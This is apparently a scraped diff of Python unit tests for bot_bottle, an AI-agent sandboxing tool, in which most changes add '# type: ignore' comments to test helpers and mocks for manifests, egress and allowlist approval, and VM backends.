def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
|
||||
"""Run `callable_` expecting a ManifestError; return its message."""
|
||||
try:
|
||||
callable_(*args, **kwargs)
|
||||
@@ -24,7 +24,7 @@ def _error_message(callable_, *args, **kwargs) -> str:
|
||||
raise AssertionError("expected ManifestError was not raised")
|
||||
|
||||
|
||||
def _build(**bottles) -> Manifest:
|
||||
def _build(**bottles) -> Manifest: # type: ignore
|
||||
"""Build a manifest with the given bottles and one trivial agent
|
||||
referencing the first bottle (so the manifest is valid)."""
|
||||
first = next(iter(bottles))
|
||||
|
||||
@@ -5,7 +5,7 @@ import unittest
|
||||
from bot_bottle.manifest import ManifestError, Manifest
|
||||
|
||||
|
||||
def _manifest(repos: dict) -> dict:
|
||||
def _manifest(repos: dict) -> dict: # type: ignore
|
||||
return {
|
||||
"bottles": {"dev": {"git-gate": {"repos": repos}}},
|
||||
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
|
||||
|
||||
@@ -5,7 +5,7 @@ import unittest
|
||||
from bot_bottle.manifest import ManifestError, GitUser, Manifest
|
||||
|
||||
|
||||
def _error_message(callable_, *args, **kwargs) -> str:
|
||||
def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
|
||||
"""Run `callable_` expecting a ManifestError; return its message."""
|
||||
try:
|
||||
callable_(*args, **kwargs)
|
||||
@@ -14,7 +14,7 @@ def _error_message(callable_, *args, **kwargs) -> str:
|
||||
raise AssertionError("expected ManifestError was not raised")
|
||||
|
||||
|
||||
def _manifest(git_user):
|
||||
def _manifest(git_user): # type: ignore
|
||||
return {
|
||||
"bottles": {"dev": {"git-gate": {"user": git_user}}},
|
||||
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
|
||||
|
||||
@@ -15,14 +15,14 @@ from bot_bottle.pipelock import (
|
||||
)
|
||||
|
||||
|
||||
def _bottle(spec):
|
||||
def _bottle(spec): # type: ignore
|
||||
return Manifest.from_json_obj({
|
||||
"bottles": {"dev": spec},
|
||||
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
|
||||
}).bottles["dev"]
|
||||
|
||||
|
||||
def _routes(routes):
|
||||
def _routes(routes): # type: ignore
|
||||
return {"egress": {"routes": routes}}
|
||||
|
||||
|
||||
|
||||
@@ -74,7 +74,7 @@ class TestYamlRoundtripPreservesPipelockFields(unittest.TestCase):
|
||||
"dlp": {"include_defaults": True, "scan_env": True},
|
||||
"request_body_scanning": {"action": "block"},
|
||||
}
|
||||
rendered = pipelock_render_yaml(cfg)
|
||||
rendered = pipelock_render_yaml(cfg) # type: ignore
|
||||
parsed = parse_yaml_subset(rendered)
|
||||
self.assertEqual(["a.example", "b.example"], parsed["api_allowlist"])
|
||||
self.assertEqual(1, parsed["version"])
|
||||
@@ -97,7 +97,7 @@ class TestYamlRoundtripPreservesPipelockFields(unittest.TestCase):
|
||||
"passthrough_domains": ["api.anthropic.com"],
|
||||
},
|
||||
}
|
||||
parsed = parse_yaml_subset(pipelock_render_yaml(cfg))
|
||||
parsed = parse_yaml_subset(pipelock_render_yaml(cfg)) # type: ignore
|
||||
parsed["api_allowlist"] = ["new.example"]
|
||||
rerendered = pipelock_render_yaml(parsed)
|
||||
roundtripped = parse_yaml_subset(rerendered)
|
||||
|
||||
@@ -221,7 +221,7 @@ class TestEgressPrintParity(unittest.TestCase):
|
||||
result.append(ln)
|
||||
elif collecting:
|
||||
if (
|
||||
ln.startswith(indent_prefix)
|
||||
ln.startswith(indent_prefix) # type: ignore
|
||||
and "egress" not in ln
|
||||
and ":" not in ln.lstrip()[:20]
|
||||
):
|
||||
|
||||
@@ -18,7 +18,7 @@ from bot_bottle.backend.smolmachines.bottle_cleanup_plan import (
|
||||
)
|
||||
|
||||
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=0, stdout=stdout, stderr=stderr,
|
||||
)
|
||||
@@ -35,7 +35,7 @@ class TestPrepareCleanup(unittest.TestCase):
|
||||
self.assertTrue(plan.empty)
|
||||
|
||||
def test_lists_machines_bundles_networks(self):
|
||||
def fake_run(argv, *a, **kw):
|
||||
def fake_run(argv, *a, **kw): # type: ignore
|
||||
if argv[:3] == ["smolvm", "machine", "ls"]:
|
||||
return _ok(stdout=(
|
||||
'[{"name":"bot-bottle-a-1","state":"running"},'
|
||||
@@ -92,7 +92,7 @@ class TestCleanup(unittest.TestCase):
|
||||
)
|
||||
calls: list[list[str]] = []
|
||||
|
||||
def fake_run(argv, *a, **kw):
|
||||
def fake_run(argv, *a, **kw): # type: ignore
|
||||
calls.append(list(argv[:4]))
|
||||
return _ok()
|
||||
|
||||
@@ -130,7 +130,7 @@ class TestCleanup(unittest.TestCase):
|
||||
_ok(), # bundle rm succeeds
|
||||
])
|
||||
|
||||
def fake_run(argv, *a, **kw):
|
||||
def fake_run(argv, *a, **kw): # type: ignore
|
||||
return next(results)
|
||||
|
||||
with patch.object(cleanup.subprocess, "run", side_effect=fake_run), \
|
||||
|
||||
@@ -76,19 +76,19 @@ class TestEnsureSmolmachine(unittest.TestCase):
|
||||
)
|
||||
|
||||
class _Reg:
|
||||
def __enter__(self_inner):
|
||||
def __enter__(self_inner): # type: ignore
|
||||
return RegistryHandle(
|
||||
network="cb-net-xyz",
|
||||
push_endpoint="cb-registry-xyz:5000",
|
||||
pull_endpoint="localhost:54321",
|
||||
)
|
||||
def __exit__(self_inner, *exc):
|
||||
def __exit__(self_inner, *exc): # type: ignore
|
||||
return False
|
||||
|
||||
calls: list[str] = []
|
||||
|
||||
def record(name):
|
||||
def _f(*a, **kw):
|
||||
def record(name): # type: ignore
|
||||
def _f(*a, **kw): # type: ignore
|
||||
calls.append(name)
|
||||
return _f
|
||||
|
||||
|
||||
@@ -15,13 +15,13 @@ from unittest.mock import patch
|
||||
from bot_bottle.backend.smolmachines import local_registry
|
||||
|
||||
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=0, stdout=stdout, stderr=stderr,
|
||||
)
|
||||
|
||||
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=1, stdout="", stderr=stderr,
|
||||
)
|
||||
@@ -149,7 +149,7 @@ class TestEphemeralRegistry(unittest.TestCase):
|
||||
def test_unique_session_ids_per_call(self):
|
||||
sessions: list[tuple[str, str]] = []
|
||||
|
||||
def capture(argv, *a, **kw):
|
||||
def capture(argv, *a, **kw): # type: ignore
|
||||
if argv[:3] == ["docker", "network", "create"]:
|
||||
return _ok()
|
||||
if argv[:2] == ["docker", "run"]:
|
||||
@@ -242,7 +242,7 @@ class _FakeSocket:
|
||||
def __enter__(self):
|
||||
return self
|
||||
|
||||
def __exit__(self, *exc):
|
||||
def __exit__(self, *exc): # type: ignore
|
||||
return False
|
||||
|
||||
|
||||
|
||||
@@ -18,13 +18,13 @@ from unittest.mock import patch
|
||||
from bot_bottle.backend.smolmachines import loopback_alias
|
||||
|
||||
|
||||
def _ok(stdout: str = "") -> subprocess.CompletedProcess:
|
||||
def _ok(stdout: str = "") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=0, stdout=stdout, stderr="",
|
||||
)
|
||||
|
||||
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=1, stdout="", stderr=stderr,
|
||||
)
|
||||
@@ -78,7 +78,7 @@ class TestEnsurePool(unittest.TestCase):
|
||||
# lo0 only has 16+17 already; sudo runs for 18..31 (14 missing).
|
||||
runs: list[list[str]] = []
|
||||
|
||||
def fake_run(argv, *a, **kw):
|
||||
def fake_run(argv, *a, **kw): # type: ignore
|
||||
runs.append(argv)
|
||||
if argv[:2] == ["/sbin/ifconfig", "lo0"]:
|
||||
return _ok(stdout=_LO0_PARTIAL)
|
||||
@@ -97,7 +97,7 @@ class TestEnsurePool(unittest.TestCase):
|
||||
)
|
||||
|
||||
def test_sudo_failure_dies(self):
|
||||
def fake_run(argv, *a, **kw):
|
||||
def fake_run(argv, *a, **kw): # type: ignore
|
||||
if argv[:2] == ["/sbin/ifconfig", "lo0"]:
|
||||
return _ok(stdout=_LO0_DEFAULT)
|
||||
if argv[:1] == ["sudo"]:
|
||||
@@ -152,7 +152,7 @@ class TestAllocateLock(unittest.TestCase):
|
||||
import fcntl as fcntl_mod
|
||||
flock_calls: list[int] = []
|
||||
|
||||
def record_flock(fd, op):
|
||||
def record_flock(fd, op): # type: ignore
|
||||
flock_calls.append(op)
|
||||
|
||||
with tempfile.TemporaryDirectory() as tmp:
|
||||
|
||||
@@ -46,7 +46,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase):
|
||||
orig_root = _sup.bot_bottle_root
|
||||
_sup.bot_bottle_root = lambda: Path(tmp) / ".bot-bottle" # type: ignore[assignment]
|
||||
|
||||
host_env = {**os.environ, **(extra_host_env or {})}
|
||||
host_env = {**os.environ, **(extra_host_env or {})} # type: ignore
|
||||
|
||||
try:
|
||||
with (
|
||||
@@ -67,7 +67,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase):
|
||||
mock_gg.return_value.prepare.return_value = MagicMock()
|
||||
mock_pl.return_value.prepare.return_value = MagicMock()
|
||||
mock_eg.return_value.prepare.return_value = MagicMock()
|
||||
def _make_provision(**kwargs):
|
||||
def _make_provision(**kwargs): # type: ignore
|
||||
return AgentProvisionPlan(
|
||||
template="claude",
|
||||
command="claude",
|
||||
@@ -76,7 +76,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase):
|
||||
image="bot-bottle-claude:latest",
|
||||
guest_env=dict(kwargs.get("guest_env") or {}),
|
||||
)
|
||||
mock_app.side_effect = lambda **kw: _make_provision(**kw)
|
||||
mock_app.side_effect = lambda **kw: _make_provision(**kw) # type: ignore
|
||||
|
||||
from bot_bottle.backend.smolmachines.prepare import resolve_plan
|
||||
plan = resolve_plan(spec, stage_dir=stage)
|
||||
|
||||
@@ -55,7 +55,7 @@ def _exec_scripts(bottle: MagicMock) -> list[str]:
|
||||
return [c.args[0] for c in bottle.exec.call_args_list]
|
||||
|
||||
|
||||
def _exec_users(bottle: MagicMock) -> list[str]:
|
||||
def _exec_users(bottle: MagicMock) -> list[str]: # type: ignore
|
||||
"""user= kwarg from each bottle.exec call, in order."""
|
||||
return [c.kwargs.get("user", "node") for c in bottle.exec.call_args_list]
|
||||
|
||||
@@ -64,8 +64,8 @@ def _plan(
|
||||
*,
|
||||
agent_prompt: str = "",
|
||||
skills: list[str] | None = None,
|
||||
git: list[GitEntry] = (),
|
||||
git_user: dict | None = None,
|
||||
git: list[GitEntry] = (), # type: ignore
|
||||
git_user: dict | None = None, # type: ignore
|
||||
copy_cwd: bool = False,
|
||||
user_cwd: str = "/tmp/x",
|
||||
stage_dir: Path | None = None,
|
||||
@@ -80,8 +80,8 @@ def _plan(
|
||||
agent_provider_template: str = "claude",
|
||||
guest_env: dict[str, str] | None = None,
|
||||
) -> SmolmachinesBottlePlan:
|
||||
bottle_json: dict = {}
|
||||
git_gate_json: dict = {}
|
||||
bottle_json: dict = {} # type: ignore
|
||||
git_gate_json: dict = {} # type: ignore
|
||||
if git:
|
||||
git_gate_json["repos"] = {
|
||||
g.Name: {
|
||||
|
||||
@@ -85,7 +85,7 @@ class TestReadWinsize(unittest.TestCase):
|
||||
|
||||
calls: list[int] = []
|
||||
|
||||
def fake_ioctl(fd, req, buf):
|
||||
def fake_ioctl(fd, req, buf): # type: ignore
|
||||
calls.append(fd)
|
||||
if fd == 0:
|
||||
raise OSError("stdin not a tty")
|
||||
@@ -105,7 +105,7 @@ class TestReadWinsize(unittest.TestCase):
|
||||
struct.pack("hhhh", 24, 80, 0, 0), # stdout: real
|
||||
])
|
||||
|
||||
def fake_ioctl(fd, req, buf):
|
||||
def fake_ioctl(fd, req, buf): # type: ignore
|
||||
return next(responses)
|
||||
|
||||
with patch.object(pty_resize.fcntl, "ioctl", side_effect=fake_ioctl):
|
||||
@@ -153,7 +153,7 @@ class TestStartupSyncDeferred(unittest.TestCase):
|
||||
self.assertEqual(0, rc)
|
||||
# Timer scheduled with the documented delay constant.
|
||||
timer_cls.assert_called_once()
|
||||
delay, callback = timer_cls.call_args.args
|
||||
delay, callback = timer_cls.call_args.args # type: ignore
|
||||
self.assertEqual(pty_resize._STARTUP_SYNC_DELAY_SEC, delay)
|
||||
# _push_size never called synchronously — the only path to
|
||||
# it is via the (mocked) timer's callback firing.
|
||||
|
||||
@@ -24,19 +24,19 @@ from bot_bottle.backend.smolmachines.sidecar_bundle import (
|
||||
)
|
||||
|
||||
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=0, stdout=stdout, stderr=stderr,
|
||||
)
|
||||
|
||||
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=1, stdout="", stderr=stderr,
|
||||
)
|
||||
|
||||
|
||||
def _spec(**kwargs) -> BundleLaunchSpec:
|
||||
def _spec(**kwargs) -> BundleLaunchSpec: # type: ignore
|
||||
defaults = dict(
|
||||
slug="demo-abc12",
|
||||
network_name="bot-bottle-bundle-demo-abc12",
|
||||
@@ -45,7 +45,7 @@ def _spec(**kwargs) -> BundleLaunchSpec:
|
||||
bundle_ip="192.168.50.2",
|
||||
)
|
||||
defaults.update(kwargs)
|
||||
return BundleLaunchSpec(**defaults)
|
||||
return BundleLaunchSpec(**defaults) # type: ignore
|
||||
|
||||
|
||||
class TestNamingHelpers(unittest.TestCase):
|
||||
@@ -69,7 +69,7 @@ class TestNamingHelpers(unittest.TestCase):
|
||||
|
||||
|
||||
class TestNetworkLifecycle(unittest.TestCase):
|
||||
def _patch_run(self, **kwargs):
|
||||
def _patch_run(self, **kwargs): # type: ignore
|
||||
return patch(
|
||||
"bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run",
|
||||
**kwargs,
|
||||
@@ -200,7 +200,7 @@ class TestEnsureBundleImage(unittest.TestCase):
|
||||
|
||||
|
||||
class TestStopBundle(unittest.TestCase):
|
||||
def _patch_run(self, **kwargs):
|
||||
def _patch_run(self, **kwargs): # type: ignore
|
||||
return patch(
|
||||
"bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run",
|
||||
**kwargs,
|
||||
|
||||
@@ -28,13 +28,13 @@ from bot_bottle.backend.smolmachines.smolvm import (
|
||||
)
|
||||
|
||||
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
|
||||
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=0, stdout=stdout, stderr=stderr,
|
||||
)
|
||||
|
||||
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
|
||||
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
|
||||
return subprocess.CompletedProcess(
|
||||
args=[], returncode=1, stdout="", stderr=stderr,
|
||||
)
|
||||
|
||||
@@ -336,10 +336,10 @@ class TestToolConstants(unittest.TestCase):
|
||||
class _StubSupervise(supervise.Supervise):
|
||||
"""Concrete Supervise subclass for testing the prepare template."""
|
||||
|
||||
def start(self, plan):
|
||||
def start(self, plan): # type: ignore
|
||||
return f"stub-{plan.slug}"
|
||||
|
||||
def stop(self, target):
|
||||
def stop(self, target): # type: ignore
|
||||
return None
|
||||
|
||||
|
||||
|
||||
@@ -133,14 +133,14 @@ class TestApproveReject(_FakeHomeMixin, unittest.TestCase):
|
||||
self._original_apply_capability = supervise_cli.apply_capability_change
|
||||
# Default stubs: succeed with deterministic before/after so the
|
||||
# audit log shows a non-empty diff.
|
||||
supervise_cli.add_route = lambda slug, content: (
|
||||
supervise_cli.add_route = lambda slug, content: ( # type: ignore
|
||||
'{"routes": []}\n', '{"routes": [{"host": "x"}]}\n',
|
||||
)
|
||||
supervise_cli.apply_allowlist_change = lambda slug, content: (
|
||||
supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore
|
||||
"old.example\n", content,
|
||||
)
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: "old.example\n"
|
||||
supervise_cli.apply_capability_change = lambda slug, content: (
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: "old.example\n" # type: ignore
|
||||
supervise_cli.apply_capability_change = lambda slug, content: ( # type: ignore
|
||||
"FROM old\n", content,
|
||||
)
|
||||
|
||||
@@ -231,7 +231,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
|
||||
def test_egress_block_calls_add_route_with_proposed_json(self):
|
||||
calls = []
|
||||
supervise_cli.add_route = lambda slug, content: (
|
||||
supervise_cli.add_route = lambda slug, content: ( # type: ignore
|
||||
calls.append((slug, content)) or ("before", "after")
|
||||
)
|
||||
qp = self._enqueue_egress(
|
||||
@@ -250,7 +250,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
|
||||
def test_modify_passes_final_file_to_add_route(self):
|
||||
calls = []
|
||||
supervise_cli.add_route = lambda slug, content: (
|
||||
supervise_cli.add_route = lambda slug, content: ( # type: ignore
|
||||
calls.append(content) or ("before", "after")
|
||||
)
|
||||
qp = self._enqueue_egress()
|
||||
@@ -262,7 +262,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
self.assertEqual(['{"host": "edited.example"}\n'], calls)
|
||||
|
||||
def test_apply_failure_blocks_response_and_audit(self):
|
||||
supervise_cli.add_route = lambda slug, content: (_ for _ in ()).throw(
|
||||
supervise_cli.add_route = lambda slug, content: (_ for _ in ()).throw( # type: ignore
|
||||
EgressApplyError("docker exec failed")
|
||||
)
|
||||
qp = self._enqueue_egress()
|
||||
@@ -277,7 +277,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
self.assertEqual([], read_audit_entries("egress", "dev"))
|
||||
|
||||
def test_real_diff_lands_in_audit(self):
|
||||
supervise_cli.add_route = lambda slug, content: (
|
||||
supervise_cli.add_route = lambda slug, content: ( # type: ignore
|
||||
'{"routes": []}\n', # before
|
||||
'{"routes": [{"host": "new.example"}]}\n', # after
|
||||
)
|
||||
@@ -329,9 +329,9 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
return supervise_cli.QueuedProposal(proposal=p, queue_dir=qdir)
|
||||
|
||||
def test_url_host_merged_into_current_allowlist(self):
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n"
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" # type: ignore
|
||||
applied = []
|
||||
supervise_cli.apply_allowlist_change = lambda slug, content: (
|
||||
supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore
|
||||
applied.append((slug, content))
|
||||
or ("existing.example\n", content)
|
||||
)
|
||||
@@ -348,9 +348,9 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
self.assertNotIn("/repos/foo/bar", content) # path stripped
|
||||
|
||||
def test_host_already_in_allowlist_is_idempotent(self):
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: "api.github.com\n"
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: "api.github.com\n" # type: ignore
|
||||
applied = []
|
||||
supervise_cli.apply_allowlist_change = lambda slug, content: (
|
||||
supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore
|
||||
applied.append(content)
|
||||
or ("api.github.com\n", content)
|
||||
)
|
||||
@@ -362,8 +362,8 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
self.assertEqual("api.github.com\n", applied[0])
|
||||
|
||||
def test_apply_failure_blocks_response_and_audit(self):
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n"
|
||||
supervise_cli.apply_allowlist_change = lambda slug, content: (_ for _ in ()).throw(
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" # type: ignore
|
||||
supervise_cli.apply_allowlist_change = lambda slug, content: (_ for _ in ()).throw( # type: ignore
|
||||
PipelockApplyError("docker exec failed")
|
||||
)
|
||||
qp = self._enqueue_pipelock()
|
||||
@@ -376,7 +376,7 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
self.assertEqual([], read_audit_entries("pipelock", "dev"))
|
||||
|
||||
def test_url_without_host_raises(self):
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: ""
|
||||
supervise_cli.fetch_current_allowlist = lambda slug: "" # type: ignore
|
||||
# supervise_server's validator would catch this; if a broken
|
||||
# URL ever makes it through, the supervise TUI surfaces it too.
|
||||
qp = self._enqueue_pipelock("https:///nohost")
|
||||
@@ -413,7 +413,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
|
||||
def test_capability_block_calls_apply_with_proposed_file(self):
|
||||
calls = []
|
||||
supervise_cli.apply_capability_change = lambda slug, content: (
|
||||
supervise_cli.apply_capability_change = lambda slug, content: ( # type: ignore
|
||||
calls.append((slug, content)) or ("FROM old\n", content)
|
||||
)
|
||||
qp = self._enqueue_capability("FROM bookworm\n")
|
||||
@@ -421,7 +421,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
self.assertEqual([("dev", "FROM bookworm\n")], calls)
|
||||
|
||||
def test_apply_failure_blocks_response_and_keeps_pending(self):
|
||||
supervise_cli.apply_capability_change = lambda slug, content: (_ for _ in ()).throw(
|
||||
supervise_cli.apply_capability_change = lambda slug, content: (_ for _ in ()).throw( # type: ignore
|
||||
CapabilityApplyError("teardown failed")
|
||||
)
|
||||
qp = self._enqueue_capability()
|
||||
@@ -433,7 +433,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
)
|
||||
|
||||
def test_no_audit_log_for_capability(self):
|
||||
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content)
|
||||
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) # type: ignore
|
||||
qp = self._enqueue_capability()
|
||||
supervise_cli.approve(qp)
|
||||
# capability-block has no audit log per PRD 0013 — its record
|
||||
@@ -442,7 +442,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
|
||||
self.assertEqual([], read_audit_entries("pipelock", "dev"))
|
||||
|
||||
def test_proposal_archived_after_apply(self):
|
||||
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content)
|
||||
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) # type: ignore
|
||||
qp = self._enqueue_capability()
|
||||
supervise_cli.approve(qp)
|
||||
# Sidecar would normally archive after delivering the response,
|
||||
@@ -517,7 +517,7 @@ class TestCapabilityBlockSmolmachinesGuard(_FakeHomeMixin, unittest.TestCase):
|
||||
def setUp(self):
|
||||
self._setup_fake_home()
|
||||
self._original_apply_capability = supervise_cli.apply_capability_change
|
||||
supervise_cli.apply_capability_change = lambda slug, content: ("", content)
|
||||
supervise_cli.apply_capability_change = lambda slug, content: ("", content) # type: ignore
|
||||
|
||||
def tearDown(self):
|
||||
supervise_cli.apply_capability_change = self._original_apply_capability
|
||||
|
||||
@@ -16,7 +16,7 @@ from unittest.mock import patch
|
||||
# we mirror that by injecting bot_bottle/ onto sys.path under the
|
||||
# bare name `supervise`.
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent / "bot_bottle"))
|
||||
import supervise as _sv # noqa: E402
|
||||
import supervise as _sv # noqa: E402 # type: ignore
|
||||
|
||||
from bot_bottle import supervise_server # noqa: E402
|
||||
from bot_bottle.supervise_server import (
|
||||
@@ -330,7 +330,7 @@ class TestHandleToolsCall(unittest.TestCase):
|
||||
class TestHandleListEgressRoutes(unittest.TestCase):
|
||||
def test_url_error_returns_tool_error(self):
|
||||
class _Opener:
|
||||
def open(self, *args, **kwargs): # noqa: ANN001, ANN002, ANN003
|
||||
def open(self, *args, **kwargs): # noqa: ANN001, ANN002, ANN003 # type: ignore
|
||||
raise OSError("egress unavailable")
|
||||
|
||||
with patch.object(supervise_server.urllib.request, "build_opener", return_value=_Opener()):
|
||||
|
||||
@@ -273,18 +273,18 @@ class TestRealisticBottleFile(unittest.TestCase):
|
||||
KnownHostKey: ssh-ed25519 AAAA...
|
||||
""")
|
||||
# Spot-check the deep parts; the structure is large.
|
||||
self.assertEqual(2, len(out["egress"]["routes"]))
|
||||
self.assertEqual(2, len(out["egress"]["routes"])) # type: ignore
|
||||
self.assertEqual(
|
||||
["/didericis/"],
|
||||
out["egress"]["routes"][1]["path_allowlist"],
|
||||
out["egress"]["routes"][1]["path_allowlist"], # type: ignore
|
||||
)
|
||||
self.assertEqual(
|
||||
"Bearer",
|
||||
out["egress"]["routes"][0]["auth"]["scheme"],
|
||||
out["egress"]["routes"][0]["auth"]["scheme"], # type: ignore
|
||||
)
|
||||
self.assertEqual(
|
||||
"ssh-ed25519 AAAA...",
|
||||
out["git"]["remotes"]["gitea.dideric.is"]["KnownHostKey"],
|
||||
out["git"]["remotes"]["gitea.dideric.is"]["KnownHostKey"], # type: ignore
|
||||
)
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user